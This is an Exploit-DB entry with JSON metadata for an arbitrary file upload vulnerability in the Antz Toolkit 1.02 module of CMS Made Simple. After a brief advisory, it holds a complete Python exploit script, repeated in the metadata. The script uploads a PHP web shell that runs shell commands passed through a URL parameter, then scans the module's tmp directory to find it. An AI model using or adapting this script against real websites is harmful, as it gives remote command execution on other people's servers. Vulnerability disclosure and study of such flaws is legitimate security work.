ID EDB-ID:34300 Type exploitdb Reporter John Leitch Modified 2010-07-11T00:00:00
Description
CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/41569/info
The Antz toolkit module for CMS Made Simple is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Antz toolkit 1.02 is vulnerable; other versions may also be affected.
import socket
host = 'localhost'
path = '/cmsms'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/include.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 257\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="antzSeed"\r\n'
'\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
s.close()
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'
print 'searching for shell'
for i in range(0, 9999):
shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
if http_ok in s.recv(8192)[:len(http_ok)]:
print '\r\nshell located at http://' + host + shell_path
break
else:
print '.',
upload_shell()
{"id": "EDB-ID:34300", "hash": "e47275dfda869457585b0cd45330207d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability", "description": "CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability. Webapps exploit for php platform", "published": "2010-07-11T00:00:00", "modified": "2010-07-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/34300/", "reporter": "John Leitch", "references": [], "cvelist": [], "lastseen": "2016-02-03T20:54:23", "history": [], "viewCount": 0, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-02-03T20:54:23"}, "dependencies": {"references": [], "modified": "2016-02-03T20:54:23"}, "vulnersScore": -0.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/34300/", "sourceData": "source: http://www.securityfocus.com/bid/41569/info\r\n\r\nThe Antz toolkit module for CMS Made Simple is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.\r\n\r\nAn attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.\r\n\r\nAntz toolkit 1.02 is vulnerable; other versions may also be affected. \r\n\r\nimport socket\r\n\r\nhost = 'localhost'\r\npath = '/cmsms'\r\nport = 80\r\n\r\ndef upload_shell():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host, port))\r\n s.settimeout(8) \r\n\r\n s.send('POST ' + path + '/include.php HTTP/1.1\\r\\n'\r\n 'Host: localhost\\r\\n'\r\n 'Proxy-Connection: keep-alive\\r\\n'\r\n 'User-Agent: x\\r\\n'\r\n 'Content-Length: 257\\r\\n'\r\n 'Cache-Control: max-age=0\\r\\n'\r\n 'Origin: null\\r\\n'\r\n 'Content-Type: multipart/form-data; boundary=----x\\r\\n'\r\n 'Accept: text/html\\r\\n'\r\n 'Accept-Encoding: gzip,deflate,sdch\\r\\n'\r\n 'Accept-Language: en-US,en;q=0.8\\r\\n'\r\n 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\\r\\n'\r\n '\\r\\n'\r\n '------x\\r\\n'\r\n 'Content-Disposition: form-data; name=\"antzSeed\"\\r\\n'\r\n '\\r\\n'\r\n '\\r\\n'\r\n '------x\\r\\n'\r\n 'Content-Disposition: form-data; name=\"shell_file\"; filename=\"shell.php\"\\r\\n'\r\n 'Content-Type: application/octet-stream\\r\\n'\r\n '\\r\\n'\r\n '<?php echo \\'<pre>\\' + system($_GET[\\'CMD\\']) + \\'</pre>\\'; ?>\\r\\n'\r\n '------x--\\r\\n'\r\n '\\r\\n')\r\n\r\n resp = s.recv(8192)\r\n\r\n s.close()\r\n\r\n http_ok = 'HTTP/1.1 200 OK'\r\n \r\n if http_ok not in resp[:len(http_ok)]:\r\n print 'error uploading shell'\r\n return\r\n else: print 'shell uploaded'\r\n\r\n print 'searching for shell'\r\n\r\n for i in range(0, 9999):\r\n\r\n shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host, port))\r\n s.settimeout(8) \r\n \r\n s.send('GET ' + shell_path + ' HTTP/1.1\\r\\n'\\\r\n 'Host: ' + host + '\\r\\n\\r\\n')\r\n\r\n if http_ok in s.recv(8192)[:len(http_ok)]:\r\n print '\\r\\nshell located at http://' + host + shell_path\r\n break\r\n else:\r\n print '.',\r\n\r\nupload_shell()\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}